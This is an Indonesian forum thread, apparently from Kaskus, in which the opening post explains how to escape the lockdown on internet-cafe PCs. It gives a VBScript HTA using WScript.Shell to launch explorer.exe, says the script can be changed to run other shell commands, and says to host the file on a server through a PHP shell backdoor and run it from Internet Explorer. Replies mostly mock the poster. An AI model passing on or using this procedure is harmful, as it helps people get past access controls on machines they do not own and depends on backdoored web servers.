alexa-tracking

Main Content

1024
1024
KASKUS
51
244
https://www.kaskus.co.id/thread/50921bf90a75b4ef07000000/hot-cara-bypass-security-warnet-tanpa-hack-tools
[HOT] Cara bypass security warnet tanpa hack tools !!

[HOT] Cara bypass security warnet tanpa hack tools !!

spek pc warnet:
- gak ada start menu, ms dos prompt dan explorer
- gak bisa klik kanan, drive tidak bisa diakses dari internet explorer
gak ada start menu apalagi ms dos prompt dan explorer pun gak bisa dibuka, untuk membypass tanpa tool bisa dilakukan dengan banyak cara salah satunya dg hanya menggunakan
internet explorer , php shell backdoor dan notepad, kombinasi di itu bisa digunakan untuk mengeksekusi ms dos command , ga percaya??? ini stepnya:
1. buka internet explorer, pilih menu file, lalu edit with notepad (klo gak ada menu edit with notepad , akses dulu situs lalu setelah itu baru klik file -> edit with notepad)
2. setelah notepad terbuka , siapkan skrip ini:
Code:

[removed]
Dim awakenz
Set awakenz = CreateObject("WScript.Shell")
awakenz.run("explorer.exe")
[removed]


keterangan: awakenz.run("explorer.exe") untuk menjalankan explorer.exe ,
bisa dimodif untuk menjalankan perintah shell dos lain.

simpan file tadi dengan nama misal: root.hta , lalu upload ke server dengan backdoor php shell yang sudah disiapkan,

3. untuk membuka explorer.exe , akses alamat upload file root.hta tadi yang diupload ke internet (via php shell backdoor) dengan internet explorer (gak bisa pake browser laen selaen ie soalnya ini vbs), misal di sini saya upload file hta tadi ke http://sowiesoft.com/.../root.hta

4. akan muncul pilihan: run / save / cancel , selanjutnya pilih run
maka tidak lama kemudian akan muncul explorer.exe

[HOT] Cara bypass security warnet tanpa hack tools !!


coba tes buka ini di warnet dg internet explorer:

http://sowiesoft.com/.../root.hta
mau hack ya??? emoticon-Ngakak
link ente ngga bisa tuh emoticon-Ngakak
Quote:Original Posted By Bata.Killer.8
mau hack ya??? emoticon-Ngakak
link ente ngga bisa tuh emoticon-Ngakak


ane perbaiki dulu emoticon-Big Grin
Quote:Original Posted By fanglisinaulan


ane perbaiki dulu emoticon-Big Grin


jiah nih orang kagak kapok2nya bikin trit hack,belajar dulu ke : http://www.kaskus.co.id/forum/22/bua...atihan-posting emoticon-Ngakak
Kayaknya ga lama lagi bakal ada kaskuser digebukin di warnet.emoticon-Ngakakemoticon-Ngakak
Quote:Original Posted By senopati994
Kayaknya ga lama lagi bakal ada kaskuser digebukin di warnet.emoticon-Ngakakemoticon-Ngakak

ane juga ngeri kalo ngakalin warnet, takut digebukin.
kalo cuma 10rb aja mending bayar daripada babak belur gan emoticon-Peace
bener gan .... bisa berabe tuh wkwkwkwk emoticon-Ngakak (S) Quote:Original Posted By Avenged7fxld

ane juga ngeri kalo ngakalin warnet, takut digebukin.
kalo cuma 10rb aja mending bayar daripada babak belur gan emoticon-Peace